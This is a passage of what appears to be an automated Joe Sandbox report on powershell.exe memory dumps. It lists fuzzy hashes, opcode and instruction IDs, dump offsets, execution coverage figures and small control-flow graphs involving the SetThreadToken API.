                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5faab57fcee746940df02e10b84c57eafbf057dd82e62356fd9903f72bcb77c
                                                                                                                                              • Instruction ID: ad03a70578748f41d17e85372f5f00bf15c465c85cc51d337463ad0f57182410
                                                                                                                                              • Opcode Fuzzy Hash: f5faab57fcee746940df02e10b84c57eafbf057dd82e62356fd9903f72bcb77c
                                                                                                                                              • Instruction Fuzzy Hash: 85E012353005108F97109F1DD454D66F7FAEFCE62531510A9F545CB735DA61EC01DB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 70a9b9976cb97ff23f4d34ae5165fd1c41950f6303d883ab02fe6d1ba4aa0a7c
                                                                                                                                              • Instruction ID: 914457859e2b0dc6e6f2d2d04f9ef3b42d5a8fdafb5e60f11c6f13287e43eba4
                                                                                                                                              • Opcode Fuzzy Hash: 70a9b9976cb97ff23f4d34ae5165fd1c41950f6303d883ab02fe6d1ba4aa0a7c
                                                                                                                                              • Instruction Fuzzy Hash: C6E026A330021A27731064AEA810AF76BDF8BC80A4F4401BB8909D7B53DE44AC0293F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 21d0233bd1d5880b31626d3005e09620298d2b5553bf906c955d8a8bb2b6f2c7
                                                                                                                                              • Instruction ID: 48ac6c1b2917f46937ab61d0e7e135a4ea69bbb111a172de14ad66bbbce3f20a
                                                                                                                                              • Opcode Fuzzy Hash: 21d0233bd1d5880b31626d3005e09620298d2b5553bf906c955d8a8bb2b6f2c7
                                                                                                                                              • Instruction Fuzzy Hash: 06E0223270460067D201622EB80189EBBAADFC9172700402FE50987301DE69FC0587E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4dfbc416a37dca9f98c0fc1f060a9ef9f6df1383eea400dd9871a11b3732b287
                                                                                                                                              • Instruction ID: 3bb2df2249347ba2fedba7c453af67b4c8b5f784b12e5f35333c58ac0e5a11ad
                                                                                                                                              • Opcode Fuzzy Hash: 4dfbc416a37dca9f98c0fc1f060a9ef9f6df1383eea400dd9871a11b3732b287
                                                                                                                                              • Instruction Fuzzy Hash: 9EE0E5357042005BDB083774EC1D3ED7A57BFC4725F04002ADA1A43241CF2D1C4283D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 709c4b77e0dcd450e89367485c1437880f9ced45b8565531fd4dd6e1f137c5cd
                                                                                                                                              • Instruction ID: 0dcc1092607428e3c725e23b906c37f1142825e0b9d35029db5077989da1b73d
                                                                                                                                              • Opcode Fuzzy Hash: 709c4b77e0dcd450e89367485c1437880f9ced45b8565531fd4dd6e1f137c5cd
                                                                                                                                              • Instruction Fuzzy Hash: 03F08C70A053108BE7609FB8D8D83DA7BA1FF80314F04446AD95ED7281CB386981CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af24116eb1b794b95cdb8e8dfc21f8f68864b79c8c161a0de39de6f873c36b47
                                                                                                                                              • Instruction ID: 1f0a6a947dc8a29ee071e472516b408d32dd61df0157387470eae2d8a98fd831
                                                                                                                                              • Opcode Fuzzy Hash: af24116eb1b794b95cdb8e8dfc21f8f68864b79c8c161a0de39de6f873c36b47
                                                                                                                                              • Instruction Fuzzy Hash: 58F0ED709013149BE764AFB9D89979ABBE5FB44310F104429E65ED7240DB396881CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8e3fbeb6e5166159ee461e5d177c3eb681f9e6aefe7dfd340f320bddeced13d3
                                                                                                                                              • Instruction ID: 2a74f2dfc99cf6991ac71c287d1b5d701d1ce0bb11a61cce63a4a23a92adc571
                                                                                                                                              • Opcode Fuzzy Hash: 8e3fbeb6e5166159ee461e5d177c3eb681f9e6aefe7dfd340f320bddeced13d3
                                                                                                                                              • Instruction Fuzzy Hash: E8E0C9719052499FCB40DFB8C88169AFBF4EF46204B5489EAC849DB611E6319A41CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a008f7e207b4366dc030aeebb776179798680ad5b109183265a8dbc03e96f1e
                                                                                                                                              • Instruction ID: f0d33af055dad245331dac7f2e835ebfde8dd2f50a0af7a1379b7244739e1d3b
                                                                                                                                              • Opcode Fuzzy Hash: 8a008f7e207b4366dc030aeebb776179798680ad5b109183265a8dbc03e96f1e
                                                                                                                                              • Instruction Fuzzy Hash: 38E0803570551457DB093775D81D2ED7A56FBC4725F04012ADA1A83340CF7D5D0553D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 372345f33f7da48c31dfd646b1b8aa1e32cdb08653bea5f0404080ac482a7337
                                                                                                                                              • Instruction ID: 8e193df8e72801221a3144306d9d0c17464a1b390d2285b6886d7f17eb582e0d
                                                                                                                                              • Opcode Fuzzy Hash: 372345f33f7da48c31dfd646b1b8aa1e32cdb08653bea5f0404080ac482a7337
                                                                                                                                              • Instruction Fuzzy Hash: EBD05BD330011E27371474AE541067751CF9AC8494F0541BA9909D3352DD40EC0293F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b062aadf7030057788b7a64d91e4d5943352b37af836418750b32e93d320ac73
                                                                                                                                              • Instruction ID: 70ab7008a260416ae076866f7ba523b7b6e4968475d9f7c02dc285e3d12d0000
                                                                                                                                              • Opcode Fuzzy Hash: b062aadf7030057788b7a64d91e4d5943352b37af836418750b32e93d320ac73
                                                                                                                                              • Instruction Fuzzy Hash: 70D02B227081A5179F0A913E74207A62E9B4BCB16070C807AA50CCB702CC41DC0243E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction ID: c60900a7ade261063ff0fb460c63a9f741ad313e87d9b4d859dc4d580b6c0390
                                                                                                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction Fuzzy Hash: 60E08631B00114978B089559D8504DDF7BAEBCC220F04C47AD90AA7750DA32791A96E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a13206728e2c88602033dda982203b71dd935ad489fd130d33dd66e2d277bd0e
                                                                                                                                              • Instruction ID: e2e8a0b2dc9be2d85bdda3928cfc59514415a1dfc60c13fdaaec8f8c9feedb5b
                                                                                                                                              • Opcode Fuzzy Hash: a13206728e2c88602033dda982203b71dd935ad489fd130d33dd66e2d277bd0e
                                                                                                                                              • Instruction Fuzzy Hash: 9DE0C231700610679211662EB80089F77EBEFC86B2314802FE90AC7300DE65FC068BD6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 14fa6630b28710f92472402b2a7ffddf2c0665894a1fbac1ba2ef9eb0e7cff14
                                                                                                                                              • Instruction ID: 205107fdcf1583c3c34f6e1bf7d8c3f886706402a0266e46a6c34ab0efc02ae6
                                                                                                                                              • Opcode Fuzzy Hash: 14fa6630b28710f92472402b2a7ffddf2c0665894a1fbac1ba2ef9eb0e7cff14
                                                                                                                                              • Instruction Fuzzy Hash: 16E04F31905209ABCB18BB60F85B4FDBF34F644346B400459DA1653690DB242A46CBD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 78bf95f04647106e2b305e8ae7f72089324d8b9f9cef13a16d2b6e86b18def1a
                                                                                                                                              • Instruction ID: c30e00dcd781985ba722a629aefcf18915ed4c63fca369e6f70e4cce3a3a05a5
                                                                                                                                              • Opcode Fuzzy Hash: 78bf95f04647106e2b305e8ae7f72089324d8b9f9cef13a16d2b6e86b18def1a
                                                                                                                                              • Instruction Fuzzy Hash: 3AE04F35A0A3499BC718EF64E4474FA7FB1EB49200B00415AEA4987351EA301D86DBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e7bd2905d2a7047650df7acf3dbf8c863076030cd1524ecd56f00bd09cc7b5c7
                                                                                                                                              • Instruction ID: bc23b05124464aca6cc75a5e6defe054758ed680142a2222c68ca1898ee5602a
                                                                                                                                              • Opcode Fuzzy Hash: e7bd2905d2a7047650df7acf3dbf8c863076030cd1524ecd56f00bd09cc7b5c7
                                                                                                                                              • Instruction Fuzzy Hash: F1D05E3504E3846FC3038B79A4504E83FB09D43A1431507DBD4828A253C96A448ACB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0a92d605928d2267dc61a9cadf112dd15180f7cb2c69cf53a77d52161b7cbd8d
                                                                                                                                              • Instruction ID: d8f4ee5636a11e179ba7c81539ac2ed544a73b0cb50f926349e9caa0dea6d37e
                                                                                                                                              • Opcode Fuzzy Hash: 0a92d605928d2267dc61a9cadf112dd15180f7cb2c69cf53a77d52161b7cbd8d
                                                                                                                                              • Instruction Fuzzy Hash: 63C0123B50D2C00FEF0B82340C260F22F3109AB61030946E7C086E7153C828054A8222
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction ID: 8b4ed5e7d7c2a9c3cdc1d4b6b06c624ca4c98b2731fae56c04ebd5edbfe3f468
                                                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction Fuzzy Hash: 1AD06271D042099F8780EFADC94156DFBF4EB49204F5089AA8919D7311F73156129FD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdd19c1883fceebd03e230a9c9c6a9d6482b24bee8885094f059b65936481295
                                                                                                                                              • Instruction ID: c28488fe2649b4114b01da5c5b0486b3c8e59bacde7cf65e55abbfb933d7886a
                                                                                                                                              • Opcode Fuzzy Hash: fdd19c1883fceebd03e230a9c9c6a9d6482b24bee8885094f059b65936481295
                                                                                                                                              • Instruction Fuzzy Hash: 74D06731905209ABCB08BBA4E85B4FDBB34FA54301F404569D90753590EB252A5ACFC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 026c097ee5a5b99bf953486e3da001567605ce2bcb0ccc3b1a844b1e4fa82e86
                                                                                                                                              • Instruction ID: 7991e682ca41ed86bedf139b93c2f6ee3addd1a587d832f59b8e2627074bc5ee
                                                                                                                                              • Opcode Fuzzy Hash: 026c097ee5a5b99bf953486e3da001567605ce2bcb0ccc3b1a844b1e4fa82e86
                                                                                                                                              • Instruction Fuzzy Hash: 0CD06734A093099BC754FFA4E9474AEBFB5FB85201F10416AD94993350EA346896DBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 546e526bcf0fc112e138d4c301b170641f35f081773e1a415e18721e0ce3589c
                                                                                                                                              • Instruction ID: 0c013de0b575fb155fe10cf6018bb48db70032b5b8c295a752a5c2a1b44aaeb5
                                                                                                                                              • Opcode Fuzzy Hash: 546e526bcf0fc112e138d4c301b170641f35f081773e1a415e18721e0ce3589c
                                                                                                                                              • Instruction Fuzzy Hash: 6EB092300847088FC3186FB9A80482877A9AA4870539104A9E80A0A2928F7AE844CE54

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:3
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 20997 85e7280 20998 85e72c3 SetThreadToken 20997->20998 20999 85e72f1 20998->20999

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4abb569-4abb591 1 4abb593 0->1 2 4abb596-4abb8d1 call 4abaa7c 0->2 1->2 63 4abb8d6-4abb8dd 2->63
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: sTdn^$[dn^
                                                                                                                                              • API String ID: 0-1820372456
                                                                                                                                              • Opcode ID: f55558627d112f9889687ab2d87977d8543c5153b2170c7f29af366e6ea4efc1
                                                                                                                                              • Instruction ID: 659d150fa3574d410da04d2dc0229c863a6b40506693166503f12e3c0bc635d6
                                                                                                                                              • Opcode Fuzzy Hash: f55558627d112f9889687ab2d87977d8543c5153b2170c7f29af366e6ea4efc1
                                                                                                                                              • Instruction Fuzzy Hash: 45917370B017189FEB15EFB889105AEBBB2EFC4B00B00891DD546AB394DF34AD059BE5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 64 4abb578-4abb591 65 4abb593 64->65 66 4abb596-4abb8d1 call 4abaa7c 64->66 65->66 127 4abb8d6-4abb8dd 66->127
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: sTdn^$[dn^
                                                                                                                                              • API String ID: 0-1820372456
                                                                                                                                              • Opcode ID: 52d39ff1268e8a40cb1db97964f4ad580b72a7889774d1d2443b9ef61aa93900
                                                                                                                                              • Instruction ID: ca787e1a05509308c69b3fdda7cbe72378aa90f50a00cfcb5ee692e58bec0f2b
                                                                                                                                              • Opcode Fuzzy Hash: 52d39ff1268e8a40cb1db97964f4ad580b72a7889774d1d2443b9ef61aa93900
                                                                                                                                              • Instruction Fuzzy Hash: 8B916270B017189FEB15EFB489105AEBBE2EFC4B00B00891DD546AB794DF34AD059BE5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 128 85e7278-85e72bb 129 85e72c3-85e72ef SetThreadToken 128->129 130 85e72f8-85e7315 129->130 131 85e72f1-85e72f7 129->131 131->130
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1962346923.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_85e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadToken
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3254676861-0
                                                                                                                                              • Opcode ID: 5370d244c227ad153d4dcc0361431e192ad4490f45eab57bbafdb63c82aefda0
                                                                                                                                              • Instruction ID: aa7ec8728f7adeabea663c5c233b7158864d8a7284e548c1c066fb6a04b108f0
                                                                                                                                              • Opcode Fuzzy Hash: 5370d244c227ad153d4dcc0361431e192ad4490f45eab57bbafdb63c82aefda0
                                                                                                                                              • Instruction Fuzzy Hash: 6111F3759002498FDB10DFAAD884BDEFBF4EF49324F24846AE419A7650C774A944CFA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 134 85e7280-85e72ef SetThreadToken 136 85e72f8-85e7315 134->136 137 85e72f1-85e72f7 134->137 137->136
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1962346923.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_85e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadToken
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3254676861-0
                                                                                                                                              • Opcode ID: 65f1804c971eb28b6409b1f20d34121a16326dbfc9648180fb494ccacf8a8475
                                                                                                                                              • Instruction ID: deb308bd3eaff08950bccd8fea1c7c09d7b8a34dd2679f6a30604758599f9e52
                                                                                                                                              • Opcode Fuzzy Hash: 65f1804c971eb28b6409b1f20d34121a16326dbfc9648180fb494ccacf8a8475
                                                                                                                                              • Instruction Fuzzy Hash: 0A1125B59003498FDB10CF9AC844B9EFBF4FB48214F20846AE418A3350C774A944CFA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 140 4abae10-4abaea1 148 4abaeab-4abaeb6 140->148 160 4abaeb9 call 4abaf58 148->160 161 4abaeb9 call 4abaf47 148->161 149 4abaebf-4abaf44 call 4aba75c 160->149 161->149
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ^dn^
                                                                                                                                              • API String ID: 0-449800444
                                                                                                                                              • Opcode ID: 752082725e361440e1e0ba95d640788fee8262f3e9bcbd733647383ee3f9dd9e
                                                                                                                                              • Instruction ID: 830eeab1ff2f28c32647cce4027e9bc007576cbd17367248a41a8ff5fc998eb9
                                                                                                                                              • Opcode Fuzzy Hash: 752082725e361440e1e0ba95d640788fee8262f3e9bcbd733647383ee3f9dd9e
                                                                                                                                              • Instruction Fuzzy Hash: 383166B4E002089FEB05EFA4D458BAE77B6EFC4304F118479D911AB395DB74AD45CBA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 162 4abae20-4abaeb6 181 4abaeb9 call 4abaf58 162->181 182 4abaeb9 call 4abaf47 162->182 170 4abaebf-4abaf44 call 4aba75c 181->170 182->170
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ^dn^
                                                                                                                                              • API String ID: 0-449800444
                                                                                                                                              • Opcode ID: 4b241f306b3451682eb59810aacebe7bcba1249cc7a61fc6a9f8eba26fbb7633
                                                                                                                                              • Instruction ID: e1849b7ee84d71191e375c10eb3b78426373d6a6771dcffffcd01dd7e37f201c
                                                                                                                                              • Opcode Fuzzy Hash: 4b241f306b3451682eb59810aacebe7bcba1249cc7a61fc6a9f8eba26fbb7633
                                                                                                                                              • Instruction Fuzzy Hash: F43121B4E002089FEB04EFA4D458BAE77B6EFC4304F118479DA15AB395DB75AD418BA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1956789628.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_71e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cc938f12d26a5b0f31fdf3dedced9301eb8f99031679ea026a4be03373e6a246
                                                                                                                                              • Instruction ID: a5f7dce6a731c5c3458d3900442667db77a0ffb2cc5a0d28d531fd298e7889ea
                                                                                                                                              • Opcode Fuzzy Hash: cc938f12d26a5b0f31fdf3dedced9301eb8f99031679ea026a4be03373e6a246
                                                                                                                                              • Instruction Fuzzy Hash: A22239B1B10B06DFDB15DBA9C4617AAB7EDBF89210F14807AE805CB291DB75CC41C7A2

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
